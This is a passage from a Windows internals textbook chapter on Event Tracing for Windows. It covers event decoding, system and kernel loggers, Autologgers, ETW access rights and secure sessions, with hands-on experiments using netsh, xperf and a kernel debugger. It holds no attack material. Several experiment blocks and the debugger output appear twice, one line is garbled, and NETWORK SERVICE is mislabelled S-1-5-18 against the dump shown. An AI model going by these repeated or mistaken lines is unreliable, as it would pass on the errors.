register the provider’s binary in the HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\
Publishers registry key. The latter is important for event decoding, especially for the following reasons:
I
The system consults the Publishers key when it wants to resolve a provider name to its GUID
(from an ETW point of view, providers do not have a name). This allows tools like Xperf to dis-
play readable provider names instead of their GUIDs.
I
The Trace Decode Helper Library consults the key to retrieve the provider’s binary file, parse its
resource section, and read the binary content of the events descriptor.
After the event descriptor is obtained, the Trace Decode Helper Library gains all the needed infor-
mation for decoding the event (by parsing the binary descriptor) and allows consumer applications
to use the TdhGetEventInformation API to retrieve all the fields that compose the event’s payload and
the correct interpretation the data associated with them. TDH follows a similar procedure for MOF and
WPP providers (while TraceLogging incorporates all the decoding data in the event payload, which fol-
lows a standard binary format).
Note that all events are natively stored by ETW in an ETL log file, which has a well-defined uncom-
pressed binary format and does not contain event decoding information. This means that if an ETL file
is opened by another system that has not acquired the trace, there is a good probability that it will not
be able to decode the events. To overcome these issues, the Event Viewer uses another binary format:
514
CHAPTER 10 Management, diagnostics, and tracing
EVTX. This format includes all the events and their decoding information and can be easily parsed by
any application. An application can use the EvtExportLog Windows Event Log API to save the events
included in an ETL file with their decoding information in an EVTX file.
EXPERIMENT: Decoding an ETL file
Windows has multiple tools that use the EvtExportLog API to automatically convert an ETL log file
and include all the decoding information. In this experiment, you use netsh.exe, but TraceRpt.exe
also works well:
1.
Open a command prompt and move to the folder where the ETL file produced by the
previous experiment (“Listing processes activity using ETW”) resides and insert
netsh trace convert input=process_trace.etl output=process_trace.txt dump=txt
overwrite=yes
2.
where process_trace.etl is the name of the input log file, and process_trace.
txt file is the name of the output decoded text file.
3.
If you open the text file, you will find all the decoded events (one for each line) with a
description, like the following:
[2]1B0C.1154::2020-05-01 12:00:42.075601200 [Microsoft-Windows-Kernel-Process]
Process 1808 started at time 2020 - 05 - 01T19:00:42.075562700Z by parent 6924
running in session 1 with name \Device\HarddiskVolume4\Windows\System32\notepad.
exe.
4.
From the log, you will find that rarely some events are not decoded completely or do
not contain any description. This is because the provider manifest does not include the
needed information (a good example is given from the ThreadWorkOnBehalfUpdate
event). You can get rid of those events by acquiring a trace that does not include their
keyword. The event keyword is stored in the CSV or EVTX file.
5.
Use netsh.exe to produce an EVTX file with the following command:
netsh trace convert input=process_trace.etl output=process_trace.evtx dump=evtx
overwrite=yes
6.
Open the Event Viewer. On the console tree located in the left side of the window,
right-click the Event Viewer (Local) root node and select Open Saved Logs. Choose the
just-created process_trace.evtx file and click Open.
7.
In the Open Saved Log window, you should give the log a name and select a folder
to display it. (The example accepted the default name, process_trace and the default
Saved Logs folder.)
EXPERIMENT: Decoding an ETL file
Windows has multiple tools that use the EvtExportLog API to automatically convert an ETL log file
and include all the decoding information. In this experiment, you use netsh.exe, but TraceRpt.exe
also works well:
1.
Open a command prompt and move to the folder where the ETL file produced by the
previous experiment (“Listing processes activity using ETW”) resides and insert
netsh trace convert input=process_trace.etl output=process_trace.txt dump=txt
overwrite=yes
2.
where process_trace.etl is the name of the input log file, and process_trace.
txt file is the name of the output decoded text file.
3.
If you open the text file, you will find all the decoded events (one for each line) with a
description, like the following:
[2]1B0C.1154::2020-05-01 12:00:42.075601200 [Microsoft-Windows-Kernel-Process]
Process 1808 started at time 2020 - 05 - 01T19:00:42.075562700Z by parent 6924
running in session 1 with name \Device\HarddiskVolume4\Windows\System32\notepad.
exe.
4.
From the log, you will find that rarely some events are not decoded completely or do
not contain any description. This is because the provider manifest does not include the
needed information (a good example is given from the ThreadWorkOnBehalfUpdate
event). You can get rid of those events by acquiring a trace that does not include their
keyword. The event keyword is stored in the CSV or EVTX file.
5.
Use netsh.exe to produce an EVTX file with the following command:
netsh trace convert input=process_trace.etl output=process_trace.evtx dump=evtx
overwrite=yes
6.
Open the Event Viewer. On the console tree located in the left side of the window,
right-click the Event Viewer (Local) root node and select Open Saved Logs. Choose the
just-created process_trace.evtx file and click Open.
7.
In the Open Saved Log window, you should give the log a name and select a folder
to display it. (The example accepted the default name, process_trace and the default
Saved Logs folder.)
CHAPTER 10 Management, diagnostics, and tracing
515
8.
The Event Viewer should now display each event located in the log file. Click the Date
and Time column for ordering the events by Date and Time in ascending order (from
the oldest one to the newest). Search for ProcessStart with Ctrl+F to find the event indi-
cating the Notepad.exe process creation:
9.
The ThreadWorkOnBehalfUpdate event, which has no human-readable description,
causes too much noise, and you should get rid of it from the trace. If you click one of
those events and open the Details tab, in the System node, you will find that the event
belongs to the WINEVENT_KEYWORD_ WORK_ON_BEHALF category, which has a key-
word bitmask set to 0x8000000000002000. (Keep in mind that the highest 16 bits of the
keywords are reserved for Microsoft-defined categories.) The bitwise NOT operation of
the 0x8000000000002000 64-bit value is 0x7FFFFFFFFFFFDFFF.
10. Close the Event Viewer and capture another trace with XPERF by using the following
command:
xperf -start TestSession -on Microsoft-Windows-Kernel-Process:0x7FFFFFFFFFFFDFFF
-f c:\process_trace.etl
11. Open Notepad or some other application and stop the trace as explained in the
“Listing processes activity using ETW” experiment. Convert the ETL file to an EVTX.
This time, the obtained decoded log should be smaller in size, and it does not contain
ThreadWorkOnBehalfUpdate events.
8.
The Event Viewer should now display each event located in the log file. Click the Date
and Time column for ordering the events by Date and Time in ascending order (from
the oldest one to the newest). Search for ProcessStart with Ctrl+F to find the event indi-
cating the Notepad.exe process creation:
9.
The ThreadWorkOnBehalfUpdate event, which has no human-readable description,
causes too much noise, and you should get rid of it from the trace. If you click one of
those events and open the Details tab, in the System node, you will find that the event
belongs to the WINEVENT_KEYWORD_ WORK_ON_BEHALF category, which has a key-
word bitmask set to 0x8000000000002000. (Keep in mind that the highest 16 bits of the
keywords are reserved for Microsoft-defined categories.) The bitwise NOT operation of
the 0x8000000000002000 64-bit value is 0x7FFFFFFFFFFFDFFF.
10. Close the Event Viewer and capture another trace with XPERF by using the following
command:
xperf -start TestSession -on Microsoft-Windows-Kernel-Process:0x7FFFFFFFFFFFDFFF
-f c:\process_trace.etl
11. Open Notepad or some other application and stop the trace as explained in the
“Listing processes activity using ETW” experiment. Convert the ETL file to an EVTX.
This time, the obtained decoded log should be smaller in size, and it does not contain
ThreadWorkOnBehalfUpdate events.
516
CHAPTER 10 Management, diagnostics, and tracing
System loggers
What we have described so far is how normal ETW sessions and providers work. Since Windows XP,
ETW has supported the concepts of system loggers, which allow the NT kernel to globally emit log
events that are not tied to any provider and are generally used for performance measurements. At
the time of this writing, there are two main system loggers available, which are represented by the NT
kernel logger and Circular Kernel Context Logger (while the Global logger is a subset of the NT kernel
logger). The NT kernel supports a maximum of eight system logger sessions. Every session that receives
events from a system logger is considered a system session.
To start a system session, an application makes use of the StartTrace API, but it specifies the EVENT_
TRACE_SYSTEM_LOGGER_MODE flag or the GUID of a system logger session as input parameters.
Table 10-16 lists the system logger with their GUIDs. The EtwpStartLogger function in the NT kernel
recognizes the flag or the special GUIDs and performs an additional check against the NT kernel log-
ger security descriptor, requesting the TRACELOG_GUID_ENABLE access right on behalf of the caller
process access token. If the check passes, ETW calculates a system logger index and updates both the
logger group mask and the system global performance group mask.
TABLE 10-16 System loggers
INDEX
Name
GUID
Symbol
0
NT kernel logger
{9e814aad-3204-11d2-9a82-006008a86939}
SystemTraceControlGuid
1
Global logger
{e8908abc-aa84-11d2-9a93-00805f85d7c6}
GlobalLoggerGuid
2
Circular Kernel Context Logger
{54dea73a-ed1f-42a4-af71-3e63d056f174}
CKCLGuid
The last step is the key that drives system loggers. Multiple low-level system functions, which can
run at a high IRQL (the Context Swapper is a good example), analyzes the performance group mask
and decides whether to write an event to the system logger. A controller application can enable or
disable different events logged by a system logger by modifying the EnableFlags bit mask used by the
StartTrace API and ControlTrace API. The events logged by a system logger are stored internally in the
global performance group mask in a well-defined order. The mask is composed of an array of eight 32-
bit values. Each index in the array represents a set of events. System event sets (also called Groups) can
be enumerated using the Xperf tool. Table 10-17 lists the system logger events and the classification in
their groups. Most of the system logger events are documented at https://docs.microsoft.com/en-us/
windows/win32/api/evntrace/ns-evntrace-event_trace_properties.
CHAPTER 10 Management, diagnostics, and tracing
517
TABLE 10-17 System logger events (kernel flags) and their group
Name
Description
Group
ALL_FAULTS
All page faults including hard, copy-on-write, demand-
zero faults, and so on
None
ALPC
Advanced Local Procedure Call
None
CACHE_FLUSH
Cache flush events
None
CC
Cache manager events
None
CLOCKINT
Clock interrupt events
None
COMPACT_CSWITCH
Compact context switch
Diag
CONTMEMGEN
Contiguous memory generation
None
CPU_CONFIG
NUMA topology, processor group, and processor index
None
CSWITCH
Context switch
IOTrace
DEBUG_EVENTS
Debugger scheduling events
None
DISK_IO
Disk I/O
All except SysProf, ReferenceSet,
and Network
DISK_IO_INIT
Disk I/O initiation
None
DISPATCHER
CPU scheduler
None
DPC
DPC events
Diag, DiagEasy, and Latency
DPC_QUEUE
DPC queue events
None
DRIVERS
Driver events
None
FILE_IO
File system operation end times and results
FileIO
FILE_IO_INIT
File system operation (create/open/close/read/write)
FileIO
FILENAME
FileName (e.g., FileName create/delete/rundown)
None
FLT_FASTIO
Minifilter fastio callback completion
None
FLT_IO
Minifilter callback completion
None
FLT_IO_FAILURE
Minifilter callback completion with failure
None
FLT_IO_INIT
Minifilter callback initiation
None
FOOTPRINT
Support footprint analysis
ReferenceSet
HARD_FAULTS
Hard page faults
All except SysProf and Network
HIBERRUNDOWN
Rundown(s) during hibernate
None
IDLE_STATES
CPU idle states
None
INTERRUPT
Interrupt events
Diag, DiagEasy, and Latency
INTERRUPT_STEER
Interrupt steering events
Diag, DiagEasy, and Latency
IPI
Inter-processor interrupt events
None
KE_CLOCK
Clock configuration events
None
KQUEUE
Kernel queue enqueue/dequeue
None
LOADER
Kernel and user mode image load/unload events
Base
518
CHAPTER 10 Management, diagnostics, and tracing
Name
Description
Group
MEMINFO
Memory list info
Base, ResidentSet, and
ReferenceSet
MEMINFO_WS
Working set info
Base and ReferenceSet
MEMORY
Memory tracing
ResidentSet and ReferenceSet
NETWORKTRACE
Network events (e.g., tcp/udp send/receive)
Network
OPTICAL_IO
Optical I/O
None
OPTICAL_IO_INIT
Optical I/O initiation
None
PERF_COUNTER
Process perf counters
Diag and DiagEasy
PMC_PROFILE
PMC sampling events
None
POOL
Pool tracing
None
POWER
Power management events
ResumeTrace
PRIORITY
Priority change events
None
PROC_THREAD
Process and thread create/delete
Base
PROFILE
CPU sample profile
SysProf
REFSET
Support footprint analysis
ReferenceSet
REG_HIVE
Registry hive tracing
None
REGISTRY
Registry tracing
None
SESSION
Session rundown/create/delete events
ResidentSet and ReferenceSet
SHOULDYIELD
Tracing for the cooperative DPC mechanism
None
SPINLOCK
Spinlock collisions
None
SPLIT_IO
Split I/O
None
SYSCALL
System calls
None
TIMER
Timer settings and its expiration
None
VAMAP
MapFile info
ResidentSet and ReferenceSet
VIRT_ALLOC
Virtual allocation reserve and release
ResidentSet and ReferenceSet
WDF_DPC
WDF DPC events
None
WDF_INTERRUPT
WDF Interrupt events
None
When the system session starts, events are immediately logged. There is no provider that needs
to be enabled. This implies that a consumer application has no way to generically decode the event.
System logger events use a precise event encoding format (called NTPERF), which depends on the
event type. However, most of the data structures representing different NT kernel logger events are
usually documented in the Windows platform SDK.
CHAPTER 10 Management, diagnostics, and tracing
519
EXPERIMENT: Tracing TCP/IP activity with the kernel logger
In this experiment, you listen to the network activity events generated by the System Logger
using the Windows Performance Monitor. As already introduced in the “Enumerating ETW ses-
sions” experiment, the graphical tool is not just able to obtain data from the system performance
counters but is also able to start, stop, and manage ETW sessions (system session included). To
enable the kernel logger and have it generate a log file of TCP/IP activity, follow these steps:
1.
Run the Performance Monitor (by typing perfmon in the Cortana search box) and click
Data Collector Sets, User Defined.
2.
Right-click User Defined, choose New, and select Data Collector Set.
3.
When prompted, enter a name for the data collector set (for example, experiment),
and choose Create Manually (Advanced) before clicking Next.
4.
In the dialog box that opens, select Create Data Logs, check Event Trace Data, and
then click Next. In the Providers area, click Add, and locate Windows Kernel Trace. Click
OK. In the Properties list, select Keywords (Any), and then click Edit.
5.
From the list shown in the Property window, select Automatic and check only net for
Network TCP/IP, and then click OK.
EXPERIMENT: Tracing TCP/IP activity with the kernel logger
In this experiment, you listen to the network activity events generated by the System Logger
using the Windows Performance Monitor. As already introduced in the “Enumerating ETW ses-
sions” experiment, the graphical tool is not just able to obtain data from the system performance
counters but is also able to start, stop, and manage ETW sessions (system session included). To
enable the kernel logger and have it generate a log file of TCP/IP activity, follow these steps:
1.
Run the Performance Monitor (by typing perfmon in the Cortana search box) and click
Data Collector Sets, User Defined.
2.
Right-click User Defined, choose New, and select Data Collector Set.
3.
When prompted, enter a name for the data collector set (for example, experiment),
and choose Create Manually (Advanced) before clicking Next.
4.
In the dialog box that opens, select Create Data Logs, check Event Trace Data, and
then click Next. In the Providers area, click Add, and locate Windows Kernel Trace. Click
OK. In the Properties list, select Keywords (Any), and then click Edit.
5.
From the list shown in the Property window, select
Property window, select
Property
Automatic and check only net for
Network TCP/IP, and then click OK.
520
CHAPTER 10 Management, diagnostics, and tracing
6.
Click Next to select a location where the files are saved. By default, this location is
%SystemDrive%\PerfLogs\Admin\experiment\, if this is how you named the data
collector set. Click Next, and in the Run As edit box, enter the Administrator account
name and set the password to match it. Click Finish. You should now see a window
similar to the one shown here:
7.
Right-click the name you gave your data collector set (experiment in our example), and
then click Start. Now generate some network activity by opening a browser and visiting
a website.
8.
Right-click the data collector set node again and then click Stop.
If you follow the steps listed in the “Decoding an ETL file” experiment to decode the acquired
ETL trace file, you will find that the best way to read the results is by using a CSV file type. This
is because the System session does not include any decoding information for the events, so the
netsh.exe has no regular way to encode the customized data structures representing events in
the EVTX file.
Finally, you can repeat the experiment using XPERF with the following command (optionally
replacing the C:\network.etl file with your preferred name):
xperf -on NETWORKTRACE -f c:\network.etl
After you stop the system trace session and you convert the obtained trace file, you will get
similar events as the ones obtained with the Performance Monitor.
6.
Click Next to select a location where the files are saved. By default, this location is
%SystemDrive%\PerfLogs\Admin\experiment\, if this is how you named the data
collector set. Click Next, and in the Run As edit box, enter the Administrator account
name and set the password to match it. Click Finish. You should now see a window
similar to the one shown here:
7.
Right-click the name you gave your data collector set (experiment in our example), and
then click Start. Now generate some network activity by opening a browser and visiting
a website.
8.
Right-click the data collector set node again and then click Stop.
If you follow the steps listed in the “Decoding an ETL file” experiment to decode the acquired
ETL trace file, you will find that the best way to read the results is by using a CSV file type. This
is because the System session does not include any decoding information for the events, so the
netsh.exe has no regular way to encode the customized data structures representing events in
the EVTX file.
Finally, you can repeat the experiment using XPERF with the following command (optionally
replacing the C:\network.etl file with your preferred name):
xperf -on NETWORKTRACE -f c:\network.etl
After you stop the system trace session and you convert the obtained trace file, you will get
similar events as the ones obtained with the Performance Monitor.
CHAPTER 10 Management, diagnostics, and tracing
521
The Global logger and Autologgers
Certain logger sessions start automatically when the system boots. The Global logger session records
events that occur early in the operating system boot process, including events generated by the NT
kernel logger. (The Global logger is actually a system logger, as shown in Table 10-16.) Applications
and device drivers can use the Global logger session to capture traces before the user logs in (some
device drivers, such as disk device drivers, are not loaded at the time the Global logger session be-
gins.) While the Global logger is mostly used to capture traces produced by the NT kernel provider
(see Table 10-17), Autologgers are designed to capture traces from classic ETW providers (and not
from the NT kernel logger).
You can configure the Global logger by setting the proper registry values in the GlobalLogger key, which
is located in the HKLM\SYSTEM\CurrentControlSet\Control\WMI root key. In the same way, Autologgers
can be configured by creating a registry subkey, named as the logging session, in the Autologgers key (lo-
cated in the WMI root key). The procedure for configuring and starting Autologgers is documented at
https://docs.microsoft.com/en-us/windows/win32/etw/configuring-and-starting-an-Autologger-session.
As introduced in the “ETW initialization” section previously in this chapter, ETW starts the Global log-
ger and Autologgers almost at the same time, during the early phase 1 of the NT kernel initialization. The
EtwStartAutoLogger internal function queries all the logger configuration data from the registry, validates
it, and creates the logger session using the EtwpStartLogger routine, which has already been extensively
discussed in the “ETW sessions” section. The Global logger is a system logger, so after the session is cre-
ated, no further providers are enabled. Unlike the Global logger, Autologgers require providers to be
enabled. They are started by enumerating each session’s name from the Autologger registry key. After a
session is created, ETW enumerates the providers that should be enabled in the session, which are listed
as subkeys of the Autologger key (a provider is identified by a GUID). Figure 10-36 shows the multiple pro-
viders enabled in the EventLog-System session. This session is one of the main Windows Logs displayed
by the Windows Event Viewer (captured by the Event Logger service).
FIGURE 10-36 The EventLog-System Autologger’s enabled providers.
After the configuration data of a provider is validated, the provider is enabled in the session through
the internal EtwpEnableTrace function, as for classic ETW sessions.
522
CHAPTER 10 Management, diagnostics, and tracing
ETW security
Starting and stopping an ETW session is considered a high-privilege operation because events can in-
clude system data that can be used to exploit the system integrity (this is especially true for system log-
gers). The Windows Security model has been extended to support ETW security. As already introduced
in previous sections, each operation performed by ETW requires a well-defined access right that must
be granted by a security descriptor protecting the session, provider, or provider’s group (depending on
the operation). Table 10-18 lists all the new access rights introduced for ETW and their usage.
TABLE 10-18 ETW security access rights and their usage
Value
Description
Applied to
WMIGUID_QUERY
Allows the user to query information about the trace session
Session
WMIGUID_NOTIFICATION
Allows the user to send a notification to the session’s notification provider
Session
TRACELOG_CREATE_
REALTIME
Allows the user to start or update a real-time session
Session
TRACELOG_CREATE_ONDISK
Allows the user to start or update a session that writes events to a log file
Session
TRACELOG_GUID_ENABLE
Allows the user to enable the provider
Provider
TRACELOG_LOG_EVENT
Allows the user to log events to a trace session if the session is running in
SECURE mode
Session
TRACELOG_ACCESS_
REALTIME
Allows a consumer application to consume events in real time
Session
TRACELOG_REGISTER_GUIDS
Allows the user to register the provider (creating the EtwRegistration
object backed by the ETW_REG_ENTRY data structure)
Provider
TRACELOG_JOIN_GROUP
Allows the user to insert a manifest-based or tracelogging provider to
a Providers group (part of the ETW traits, which are not described in
this book)
Provider
Most of the ETW access rights are automatically granted to the SYSTEM account and to members of
the Administrators, Local Service, and Network Service groups. This implies that normal users are not
allowed to interact with ETW (unless an explicit session and provider security descriptor allows it). To
overcome the problem, Windows includes the Performance Log Users group, which has been designed
to allow normal users to interact with ETW (especially for controlling trace sessions). Although all the
ETW access rights are granted by the default security descriptor to the Performance Log Users group,
Windows supports another group, called Performance Monitor Users, which has been designed only
to receive or send notifications to the session notification provider. This is because the group has been
designed to access system performance counters, enumerated by tools like Performance Monitor and
Resource Monitor, and not to access the full ETW events. The two tools have been already described in
the “Performance monitor and resource monitor” section of Chapter 1 in Part 1.
As previously introduced in the “ETW Sessions” section of this chapter, all the ETW security descrip-
tors are stored in the HKLM\System\CurrentControlSet\Control\Wmi\Security registry key in a binary
format. In ETW, everything that is represented by a GUID can be protected by a customized security
descriptor. To manage ETW security, applications usually do not directly interact with security descrip-
tors stored in the registry but use the EventAccessControl and EventAccessQuery APIs implemented
in Sechost.dll.
CHAPTER 10 Management, diagnostics, and tracing
523
EXPERIMENT: Witnessing the default security descriptor of ETW sessions
A kernel debugger can easily show the default security descriptor associated with ETW sessions
that do not have a specific one associated with them. In this experiment, you need a Windows 10
machine with a kernel debugger already attached and connected to a host system. Otherwise,
you can use a local kernel debugger, or LiveKd (downloadable from https://docs.microsoft.com/
en-us/sysinternals/downloads/livekd.) After the correct symbols are configured, you should be
able to dump the default SD using the following command:
!sd poi(nt!EtwpDefaultTraceSecurityDescriptor)
The output should be similar to the following (cut for space reasons):
->Revision: 0x1
->Sbz1 : 0x0
->Control : 0x8004
SE_DACL_PRESENT
SE_SELF_RELATIVE
->Owner : S-1-5-32-544
->Group : S-1-5-32-544
->Dacl :
->Dacl : ->AclRevision: 0x2
->Dacl : ->Sbz1 : 0x0
->Dacl : ->AclSize : 0xf0
->Dacl : ->AceCount : 0x9
->Dacl : ->Sbz2
: 0x0
->Dacl : ->Ace[0]: ->AceType: ACCESS_ALLOWED_ACE_TYPE
->Dacl : ->Ace[0]: ->AceFlags: 0x0
->Dacl : ->Ace[0]: ->AceSize: 0x14
->Dacl : ->Ace[0]: ->Mask : 0x00001800
->Dacl : ->Ace[0]: ->SID: S-1-1-0
->Dacl : ->Ace[1]: ->AceType: ACCESS_ALLOWED_ACE_TYPE
->Dacl : ->Ace[1]: ->AceFlags: 0x0
->Dacl : ->Ace[1]: ->AceSize: 0x14
->Dacl : ->Ace[1]: ->Mask : 0x00120fff
->Dacl : ->Ace[1]: ->SID: S-1-5-18
->Dacl : ->Ace[2]: ->AceType: ACCESS_ALLOWED_ACE_TYPE
->Dacl : ->Ace[2]: ->AceFlags: 0x0
->Dacl : ->Ace[2]: ->AceSize: 0x14
->Dacl : ->Ace[2]: ->Mask : 0x00120fff
->Dacl : ->Ace[2]: ->SID: S-1-5-19
->Dacl : ->Ace[3]: ->AceType: ACCESS_ALLOWED_ACE_TYPE
->Dacl : ->Ace[3]: ->AceFlags: 0x0
->Dacl : ->Ace[3]: ->AceSize: 0x14
->Dacl : ->Ace[3]: ->Mask : 0x00120fff
->Dacl : ->Ace[3]: ->SID: S-1-5-20
->Dacl : ->Ace[4]: ->AceType: ACCESS_ALLOWED_ACE_TYPE
->Dacl : ->Ace[4]: ->AceFlags: 0x0
->Dacl : ->Ace[4]: ->AceSize: 0x18
->Dacl : ->Ace[4]: ->Mask : 0x00120fff
->Dacl : ->Ace[4]: ->SID: S-1-5-32-544
EXPERIMENT: Witnessing the default security descriptor of ETW sessions
A kernel debugger can easily show the default security descriptor associated with ETW sessions
that do not have a specific one associated with them. In this experiment, you need a Windows 10
machine with a kernel debugger already attached and connected to a host system. Otherwise,
you can use a local kernel debugger, or LiveKd (downloadable from https://docs.microsoft.com/
en-us/sysinternals/downloads/livekd.) After the correct symbols are configured, you should be
able to dump the default SD using the following command:
!sd poi(nt!EtwpDefaultTraceSecurityDescriptor)
The output should be similar to the following (cut for space reasons):
->Revision: 0x1
->Sbz1 : 0x0
->Control : 0x8004
SE_DACL_PRESENT
SE_SELF_RELATIVE
->Owner : S-1-5-32-544
->Group : S-1-5-32-544
->Dacl :
->Dacl : ->AclRevision: 0x2
->Dacl : ->Sbz1 : 0x0
->Dacl : ->AclSize : 0xf0
->Dacl : ->AceCount : 0x9
->Dacl : ->Sbz2
: 0x0
->Dacl : ->Ace[0]: ->AceType: ACCESS_ALLOWED_ACE_TYPE
->Dacl : ->Ace[0]: ->AceFlags: 0x0
->Dacl : ->Ace[0]: ->AceSize: 0x14
->Dacl : ->Ace[0]: ->Mask : 0x00001800
->Dacl : ->Ace[0]: ->SID: S-1-1-0
->Dacl : ->Ace[1]: ->AceType: ACCESS_ALLOWED_ACE_TYPE
->Dacl : ->Ace[1]: ->AceFlags: 0x0
->Dacl : ->Ace[1]: ->AceSize: 0x14
->Dacl : ->Ace[1]: ->Mask : 0x00120fff
->Dacl : ->Ace[1]: ->SID: S-1-5-18
->Dacl : ->Ace[2]: ->AceType: ACCESS_ALLOWED_ACE_TYPE
->Dacl : ->Ace[2]: ->AceFlags: 0x0
->Dacl : ->Ace[2]: ->AceSize: 0x14
->Dacl : ->Ace[2]: ->Mask : 0x00120fff
->Dacl : ->Ace[2]: ->SID: S-1-5-19
->Dacl : ->Ace[3]: ->AceType: ACCESS_ALLOWED_ACE_TYPE
->Dacl : ->Ace[3]: ->AceFlags: 0x0
->Dacl : ->Ace[3]: ->AceSize: 0x14
->Dacl : ->Ace[3]: ->Mask : 0x00120fff
->Dacl : ->Ace[3]: ->SID: S-1-5-20
->Dacl : ->Ace[4]: ->AceType: ACCESS_ALLOWED_ACE_TYPE
->Dacl : ->Ace[4]: ->AceFlags: 0x0
->Dacl : ->Ace[4]: ->AceSize: 0x18
->Dacl : ->Ace[4]: ->Mask : 0x00120fff
->Dacl : ->Ace[4]: ->SID: S-1-5-32-544
524
CHAPTER 10 Management, diagnostics, and tracing
->Dacl : ->Ace[5]: ->AceType: ACCESS_ALLOWED_ACE_TYPE
->Dacl : ->Ace[5]: ->AceFlags: 0x0
->Dacl : ->Ace[5]: ->AceSize: 0x18
->Dacl : ->Ace[5]: ->Mask : 0x00000ee5
->Dacl : ->Ace[5]: ->SID: S-1-5-32-559
->Dacl : ->Ace[6]: ->AceType: ACCESS_ALLOWED_ACE_TYPE
->Dacl : ->Ace[6]: ->AceFlags: 0x0
->Dacl : ->Ace[6]: ->AceSize: 0x18
->Dacl : ->Ace[6]: ->Mask : 0x00000004
->Dacl : ->Ace[6]: ->SID: S-1-5-32-558
You can use the Psgetsid tool (available at https://docs.microsoft.com/en-us/sysinternals/
downloads/psgetsid) to translate the SID to human-readable names. From the preceding output,
you can see that all ETW access is granted to the SYSTEM (S-1-5-18), LOCAL SERVICE (S-1-5-19),
NETWORK SERVICE (S-1-5-18), and Administrators (S-1-5-32-544) groups. As explained in the pre-
vious section, the Performance Log Users group (S-1-5-32-559) has almost all ETW access, where-
as the Performance Monitor Users group (S-1-5-32-558) has only the WMIGUID_NOTIFICATION
access right granted by the session’s default security descriptor.
C:\Users\andrea>psgetsid64 S-1-5-32-559
PsGetSid v1.45 - Translates SIDs to names and vice versa
Copyright (C) 1999-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
Account for AALL86-LAPTOP\S-1-5-32-559:
Alias: BUILTIN\Performance Log Users
Security Audit logger
The Security Audit logger is an ETW session used by the Windows Event logger service (wevtsvc.dll) to
listen for events generated by the Security Lsass Provider. The Security Lsass provider (which is identi-
fied by the {54849625-5478-4994-a5ba-3e3b0328c30d} GUID) can be registered only by the NT kernel
at ETW initialization time and is never inserted in the global provider’s hash table. Only the Security
audit logger and Autologgers configured with the EnableSecurityProvider registry value set to 1 can re-
ceive events from the Security Lsass Provider. When the EtwStartAutoLogger internal function encoun-
ters the value set to 1, it enables the SECURITY_TRACE flag on the associated ETW session, adding the
session to the list of loggers that can receive Security audit events.
The flag also has the important effect that user-mode applications can’t query, stop, flush, or control
the session anymore, unless they are running as protected process light (at the antimalware, Windows,
or WinTcb level; further details on protected processes are available in Chapter 3 of Part 1).
Secure loggers
Classic (MOF) and WPP providers have not been designed to support all the security features imple-
mented for manifest-based and tracelogging providers. An Autologger or a generic ETW session can
->Dacl : ->Ace[5]: ->AceType: ACCESS_ALLOWED_ACE_TYPE
->Dacl : ->Ace[5]: ->AceFlags: 0x0
->Dacl : ->Ace[5]: ->AceSize: 0x18
->Dacl : ->Ace[5]: ->Mask : 0x00000ee5
->Dacl : ->Ace[5]: ->SID: S-1-5-32-559
->Dacl : ->Ace[6]: ->AceType: ACCESS_ALLOWED_ACE_TYPE
->Dacl : ->Ace[6]: ->AceFlags: 0x0
->Dacl : ->Ace[6]: ->AceSize: 0x18
->Dacl : ->Ace[6]: ->Mask : 0x00000004
->Dacl : ->Ace[6]: ->SID: S-1-5-32-558
You can use the Psgetsid tool (available at https://docs.microsoft.com/en-us/sysinternals/
downloads/psgetsid) to translate the SID to human-readable names. From the preceding output,
you can see that all ETW access is granted to the SYSTEM (S-1-5-18), LOCAL SERVICE (S-1-5-19),
NETWORK SERVICE (S-1-5-18), and Administrators (S-1-5-32-544) groups. As explained in the pre-
vious section, the Performance Log Users group (S-1-5-32-559) has almost all ETW access, where-
as the Performance Monitor Users group (S-1-5-32-558) has only the WMIGUID_NOTIFICATION
access right granted by the session’s default security descriptor.
C:\Users\andrea>psgetsid64 S-1-5-32-559
PsGetSid v1.45 - Translates SIDs to names and vice versa
Copyright (C) 1999-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
Account for AALL86-LAPTOP\S-1-5-32-559:
Alias: BUILTIN\Performance Log Users
CHAPTER 10 Management, diagnostics, and tracing
525
thus be created with the EVENT_TRACE_SECURE_MODE flag, which marks the session as secure. A
secure session has the goal of ensuring that it receives events only from trusted identities. The flag has
two main effects:
I
Prevents classic (MOF) and WPP providers from writing any event to the secure session. If a clas-
sic provider is enabled in a secure section, the provider won’t be able to generate any events.
I
Requires the supplemental TRACELOG_LOG_EVENT access right, which should be granted by
the session’s security descriptor to the controller application’s access token while enabling a
provider to the secure session.
The TRACE_LOG_EVENT access right allows a more-granular security to be specified in a session’s
security descriptor. If the security descriptor grants only the TRACELOG_GUID_ENABLE to an untrusted
user, and the ETW session is created as secure by another entity (a kernel driver or a more privileged
application), the untrusted user can’t enable any provider on the secure section. If the section is created
as nonsecure, the untrusted user can enable any providers on it.
Dynamic tracing (DTrace)
As discussed in the previous section, Event Tracing for Windows is a powerful tracing technology inte-
grated into the OS, but it’s static, meaning that the end user can only trace and log events that are gen-
erated by well-defined components belonging to the operating system or to third-party frameworks/
applications (.NET CLR, for example.) To overcome the limitation, the May 2019 Update of Windows
10 (19H1) introduced DTrace, the dynamic tracing facility built into Windows. DTrace can be used by
administrators on live systems to examine the behavior of both user programs and of the operating
system itself. DTrace is an open-source technology that was developed for the Solaris operating system
(and its descendant, illumos, both of which are Unix-based) and ported to several operating systems
other than Windows.
DTrace can dynamically trace parts of the operating system and user applications at certain locations
of interest, called probes. A probe is a binary code location or activity to which DTrace can bind a request
to perform a set of actions, like logging messages, recording a stack trace, a timestamp, and so on. When
a probe fires, DTrace gathers the data from the probe and executes the actions associated with the probe.
Both the probes and the actions are specified in a script file (or directly in the DTrace application through
the command line), using the D programming language. Support for probes are provided by kernel mod-
ules, called providers. The original illumos DTrace supported around 20 providers, which were deeply tied
to the Unix-based OS. At the time of this writing, Windows supports the following providers:
I
SYSCALL Allows the tracing of the OS system calls (both on entry and on exit) invoked from
user-mode applications and kernel-mode drivers (through Zw APIs).
I
FBT (Function Boundary tracing) Through FBT, a system administrator can trace the execution
of individual functions implemented in all the modules that run in the NT kernel.
I
PID (User-mode process tracing) The provider is similar to FBT and allows tracing of individual
functions of a user-mode process and application.
526
CHAPTER 10 Management, diagnostics, and tracing
I
ETW (Event Tracing for Windows) DTrace can use this provider to attach to manifest-based and
TraceLogging events fired from the ETW engine. DTrace is able to define new ETW providers and
provide associated ETW events via the etw_trace action (which is not part of any provider).
I
